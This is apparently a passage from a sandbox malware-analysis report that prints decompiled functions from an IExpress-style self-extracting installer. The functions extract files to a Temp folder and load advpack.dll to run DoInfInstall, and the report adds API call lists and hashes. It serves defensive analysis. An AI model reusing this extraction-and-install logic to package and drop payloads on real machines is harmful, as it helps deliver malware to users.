Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-2381869747
Opcode ID: 22b898cce70276e9d5c1e3bf47ea875c2eab6bdf862b6671a0569ddd3fbc6be6
Instruction ID: 4bdf6506aed1a6e7961d5556fd5f3a0d9fafdb5e9790c112d97161fc7e040a4d
Opcode Fuzzy Hash: 22b898cce70276e9d5c1e3bf47ea875c2eab6bdf862b6671a0569ddd3fbc6be6
Instruction Fuzzy Hash: EF01D670504308ABDB11FB64DC4AAEE737CDB51311F5001D5F585961C0DF709E868B52

Uniqueness

Uniqueness Score: -1.00%

Function 00384169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00384169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0038468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0038468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E003844B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E003844B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0038417d
0x0038418f
0x00384193
0x003841b7
0x003841d3
0x003841e6
0x00000000
0x003841e7
0x003841d5
0x003841d6
0x003841d8
0x003841d9
0x003841da
0x003841df
0x003841e1
0x00000000
0x003841e1
0x003841b9
0x003841ba
0x003841bc
0x003841bd
0x003841be
0x00000000
0x003841be
0x00000000

APIs

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003830B4), ref: 00384189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003830B4), ref: 003841E7

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Strings

FINISHMSG, xrefs: 00384173, 003841AB
<None>, xrefs: 003841C5

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 6601badf33315ac30ddf253c3ba86b405117e8502ab6a98a22fb0a3c6e6a8c94
Instruction ID: ff965c804a5543832f63debba7129a537ab8dae4100e47f87192a391d5706817
Opcode Fuzzy Hash: 6601badf33315ac30ddf253c3ba86b405117e8502ab6a98a22fb0a3c6e6a8c94
Instruction Fuzzy Hash: AC01F4F53003167BF72736664C8AF7B618EDBD4795F1140E6B705E6980DAA8DC014375

Uniqueness

Uniqueness Score: -1.00%

Function 003819E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E003819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x388004; // 0xb25159a8
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E003843D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x389a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00386CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x003819e0
0x003819e0
0x003819eb
0x003819f2
0x003819f9
0x003819fc
0x00381a01
0x00381a2a
0x00381a2e
0x00381a3e
0x00381a4f
0x00381a62
0x00381a6a
0x00000000
0x00381a03
0x00381a06
0x00381a20
0x00381a20
0x00381a08
0x00381a08
0x00381a14
0x00000000
0x00381a16
0x00381a18
0x00381a70
0x00381a72
0x00381a72
0x00381a14
0x00381a06
0x00381a81

APIs

EndDialog.USER32(?,?), ref: 00381A18
GetDesktopWindow.USER32 ref: 00381A24
LoadStringA.USER32(?,?,00000200), ref: 00381A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00381A62
MessageBeep.USER32(000000FF), ref: 00381A6A

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 6e52480ebdaef75c18ab98e35d8f8d8516500e705141f7b35458128a074081ce
Instruction ID: abacced45a9de4864d1681424b656985a5fd46e8658b5d345de12f547059edd9
Opcode Fuzzy Hash: 6e52480ebdaef75c18ab98e35d8f8d8516500e705141f7b35458128a074081ce
Instruction Fuzzy Hash: 3E11E131500309AFDB06EF64DD4CAAE77BCEF49300F0081D1F91296190DB349E11CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003863C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E003863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x388004; // 0xb25159a8
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00381781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
				E0038658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x389124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x389124 = 0x80070052;
					_t37 = 0;
				}
				return E00386CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x003863cb
0x003863d2
0x003863d8
0x003863ea
0x003863f3
0x00386401
0x00386402
0x00386410
0x00386415
0x00386433
0x00386438
0x00386449
0x00386463
0x0038646d
0x00386477
0x00386477
0x0038647a
0x0038643a
0x0038643a
0x00386444
0x00386444
0x00386492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0038647A

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 003863EB

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 1065093856-1193786559
Opcode ID: 03120dcbe7399b527d3b0ff85a6d86c0c41e7e4714708a72a7beec77e9cf300c
Instruction ID: 88d4f8f46baa6f91de6a6a20b91e9c1167486ea88c75129ef5df8b519ef786aa
Opcode Fuzzy Hash: 03120dcbe7399b527d3b0ff85a6d86c0c41e7e4714708a72a7beec77e9cf300c
Instruction Fuzzy Hash: 172181B1A00318ABDB12EF65DC86FEA776CEB45314F1041EAA585A7180DAB05D858F64

Uniqueness

Uniqueness Score: -1.00%

Function 003847E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003847E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00381680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x3891e0; // 0x2cf8298
						 *(_t34 + 4) = _t11;
						 *0x3891e0 = _t34;
						return 1;
					}
					_t25 =  *0x388584; // 0x0
					E003844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x388584; // 0x0
				E003844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x003847e8
0x003847f0
0x003847f4
0x0038480f
0x00384811
0x00384814
0x00384814
0x00384816
0x00384817
0x00384829
0x0038482b
0x0038482f
0x0038484f
0x00384852
0x00384855
0x00384855
0x00384857
0x00384858
0x00384860
0x00384865
0x0038486a
0x0038486f
0x00000000
0x00384876
0x00384831
0x00384841
0x00384847
0x0038480b
0x00000000
0x0038480b
0x003847f6
0x00384806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00384E6F), ref: 003847EA
LocalAlloc.KERNEL32(00000040,?), ref: 00384823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00384847

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00384851

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 359063898-1193786559
Opcode ID: 54e5b9b81cfb437989f9982a68c28571da3866cd96822b51ce65a31a37e79e33
Instruction ID: 9df3ea8020954eb7c9d49fe05ba27be236577fcd67006fa2634a1d3e62edbd80
Opcode Fuzzy Hash: 54e5b9b81cfb437989f9982a68c28571da3866cd96822b51ce65a31a37e79e33
Instruction Fuzzy Hash: D8112975204742AFE717AF249C18F773B5EEB85700F0585D9F9828BB41DA368C068760

Uniqueness

Uniqueness Score: -1.00%

Function 00383680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00383680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0038368c
0x0038368f
0x00383691
0x0038369f
0x003836a7
0x00000000
0x00000000
0x003836ba
0x00000000
0x003836bc
0x003836bc
0x003836c0
0x003836cb
0x003836c2
0x003836c4
0x003836c4
0x003836da
0x003836e0
0x003836e6
0x00000000
0x00000000
0x003836e6
0x00000000
0x003836ba
0x003836ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0038369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836B2
DispatchMessageA.USER32(?), ref: 003836CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003836DA

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: e9dc3d958ea73bdc558b6eca5f6a9b3e0dd6eabf566381b4f4832e404ab80c68
Instruction ID: 61dd5aa24dde92bdfe33b4aa1fdc298a4c65c9fe757570bdc03d920e48673445
Opcode Fuzzy Hash: e9dc3d958ea73bdc558b6eca5f6a9b3e0dd6eabf566381b4f4832e404ab80c68
Instruction Fuzzy Hash: C101847290031477DB315AAA9C8CEEB767CEB85F10F11019ABA05E2380E5618640C760

Uniqueness

Uniqueness Score: -1.00%

Function 003865E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E003865E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x003865e8
0x003865ed
0x003865ef
0x003865f2
0x003865f4
0x003865f4
0x003865f6
0x003865f7
0x00386608
0x00386611
0x00386618
0x0038661c
0x00000000
0x00000000
0x0038660e
0x00386623
0x00386625
0x0038663b
0x0038663b
0x0038663d
0x00386641
0x00386610
0x00386610
0x00000000
0x00386610
0x00386644
0x00386647
0x00386647
0x00386621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00382B33), ref: 00386602
CharPrevA.USER32(?,00000000), ref: 00386612
CharPrevA.USER32(?,00000000), ref: 00386629
CharNextA.USER32(00000000), ref: 00386635

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 53cb6e6e3bd5529bca2680eddc0a9250b1ad0cb7830316ff16bd8d94427c0bf9
Instruction ID: 31453a8e776b84f99e84a73d7df531ed1d973d8f440186e2723b29743ee8e87d
Opcode Fuzzy Hash: 53cb6e6e3bd5529bca2680eddc0a9250b1ad0cb7830316ff16bd8d94427c0bf9
Instruction Fuzzy Hash: 37F0F9310047906EEB332B288CCC8B7AF9CCFC7354F1A01EFE49192001E6150D068761

Uniqueness

Uniqueness Score: -1.00%

Function 003869B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003869B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x3881f8 = E00386C70();
				__set_app_type(E00386FBE(2));
				 *0x3888a4 =  *0x3888a4 | 0xffffffff;
				 *0x3888a8 =  *0x3888a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x388528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x38851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00387000();
				if( *0x388000 == 0) {
					__setusermatherr(E00387000);
				}
				E003871EF(_t6);
				return 0;
			}

0x003869b7
0x003869c2
0x003869c8
0x003869cf
0x003869d8
0x003869de
0x003869e4
0x003869e6
0x003869ec
0x003869f2
0x003869f4
0x00386a00
0x00386a07
0x00386a0d
0x00386a0e
0x00386a15

APIs

Part of subcall function 00386FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00386FC5

__set_app_type.MSVCRT ref: 003869C2
__p__fmode.MSVCRT ref: 003869D8
__p__commode.MSVCRT ref: 003869E6
__setusermatherr.MSVCRT ref: 00386A07

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: 79dc307951a65a67303a901688f1fe964a564aeccb9e972824db6e590939c6d7
Instruction ID: 8414cb35fea0b9b89024fefacbb6ed0b14643b1cb59c97fbe50b83348fa28c2a
Opcode Fuzzy Hash: 79dc307951a65a67303a901688f1fe964a564aeccb9e972824db6e590939c6d7
Instruction Fuzzy Hash: 84F098B45097019FD76BBB34FD0E6143B69FB05331F600ADAE4618A2E1CF3A85458B15

Uniqueness

Uniqueness Score: -1.00%

Function 00386952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00386952(CHAR* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				int _t22;

				_t22 = 0;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if( *__ecx != 0) {
					_t6 =  &_v20; // 0x385760
					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
					}
				}
				return _t22;
			}

0x0038695b
0x00386960
0x00386963
0x00386966
0x00386969
0x0038696c
0x00386972
0x00386987
0x0038699f
0x0038699f
0x00386987
0x003869a7

APIs

GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W8,?,00000000,00385760,?,A:\), ref: 0038697F
MulDiv.KERNEL32(?,?,00000400), ref: 00386999

Strings

`W8, xrefs: 00386972, 00386975

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: DiskFreeSpace
String ID: `W8
API String ID: 1705453755-1785618751
Opcode ID: 6123bb8281f122b2a7f963a323e6ec1eb327d9151dd1341619904ad92e54aa61
Instruction ID: 557329d410bff614581257e422dc63b719dd7572d52a9235fabd3e0bdf58c4f0
Opcode Fuzzy Hash: 6123bb8281f122b2a7f963a323e6ec1eb327d9151dd1341619904ad92e54aa61
Instruction Fuzzy Hash: DAF097B6D10228BBDB12DFE88D45ADEBBBCEB48701F1541D6E610E6240D6719A058B91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: will6283.exePID: 5504, Parent PID: 5516COMMON

Execution Graph

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	959
Total number of Limit Nodes:	25

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01063BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E01063BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x1068004; // 0x19e58fb5
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x1069124 =  *0x1069124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x1068a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x1068c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0106468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E010644B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x1069124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E01061AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E01066CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E01063FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x1068580;
													if( *0x1068580 != 0) {
														E01062267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x1068180;
											if( *0x1068180 == 0) {
												_t146 = 0x4c7;
												E010644B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x1069124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x1069a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E01066495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E010644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x1069124 = E01066285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E010644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x1068a30;
											_t151 = _v408;
